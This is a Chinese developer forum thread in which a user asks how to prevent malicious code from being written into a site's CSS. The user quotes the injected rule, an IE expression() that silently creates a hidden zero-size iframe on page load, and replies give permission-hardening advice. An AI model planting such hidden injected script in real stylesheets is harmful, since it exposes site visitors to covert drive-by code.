css 被写入恶意代码,如何防止

jingcai 2011-01-14 12:11:33
body{zoom:expression(function(ele){setTimeout(function(){var i=document.createElement('iframe');i.width=i.height=0;document.body.appendChild(i);i.contentWindow.setTimeout(function(){i.contentWindow.document.write('');},1000);},1000);ele.style.zoom='1';}(this));}
...全文
116 5 打赏 收藏 转发到动态 举报
写回复
用AI写文章
5 条回复
切换为时间正序
请发表友善的回复…
发表回复
wuyq11 2011-01-14
  • 打赏
  • 举报
 回复
检查文件夹是否存在注入等漏洞
检查相关图片
ycproc 2011-01-14
  • 打赏
  • 举报
 回复
权限问题 导致的

把 相关角色 写的 权限 给 去掉
whowhen21 2011-01-14
  • 打赏
  • 举报
 回复
把css设置为只读属性吧,或者设置权限~!
*************************************************
本内容使用CSDN小秘书回复
每天回帖即可得10分可用分!
*************************************************
whb147 2011-01-14
  • 打赏
  • 举报
 回复
找到根源
lxinglxing 2011-01-14
  • 打赏
  • 举报
 回复
这个要注意了
Ajax Hacking
它利用百度提交的自定义css(Cascading Stylesheet,层叠样式表单)中对插入的javascript过滤不严格,而使攻击者可以写入恶意代码进行了xss(Cross Site Scripting)跨站。从而使浏览该空间的百度通行证用户在不...
Web恶意代码检测方法
1 引言  随着Web2.0网站的普及和互动性的增强,统计显示Web应用漏洞已成为互联网的最大安全隐患,2009年第一季度截获...其中确定是 大型网站被挂马的“挂马网站”总数为24202个,平均每天有268个大型网站被挂马,挂马
[网络安全自学篇] 八十七.恶意代码检测技术详解及总结
这是作者网络安全自学教程...这篇文章将详细总结恶意代码检测技术,包括恶意代码检测的对象和策略、特征值检测技术、校验和检测技术、启发式扫描技术、虚拟机检测技术和主动防御技术。基础性文章,希望对您有所帮助~
如何保护Web应用程序免受恶意代码攻击
恶意代码攻击 一般来说,恶意代码攻击(malicious code attack)可以分为三类,即基于结构、基于行为和基于价值的攻击。基于结构的攻击通常通过构造恶意的代码来破坏服务器的正常运行,包括后门病毒、垃圾邮件和木马...
xss css,XSS CSS
Cross-Site Scripting: DOMABSTRACT向 Web 浏览器发送非法数据会导致浏览器执行恶意代码。EXPLANATIONCross-Site Scripting (XSS) 漏洞在以下情况下发生:1. 数据通过一个不可信赖的数据源进入 Web 应用程序。对于...
.NET社区

62,046

社区成员

669,049

社区内容

发帖
与我相关
我的任务
社区描述
.NET技术交流专区
javascript云原生 企业社区
社区管理员
  • ASP.NET
  • .Net开发者社区
  • R小R
加入社区
  • 近7日
  • 近30日
  • 至今

加载中

查看更多榜单
社区公告

.NET 社区是一个围绕开源 .NET 的开放、热情、创新、包容的技术社区。社区致力于为广大 .NET 爱好者提供一个良好的知识共享、协同互助的 .NET 技术交流环境。我们尊重不同意见,支持健康理性的辩论和互动,反对歧视和攻击。

希望和大家一起共同营造一个活跃、友好的社区氛围。

试试用AI创作助手写篇文章吧

+ 用AI写文章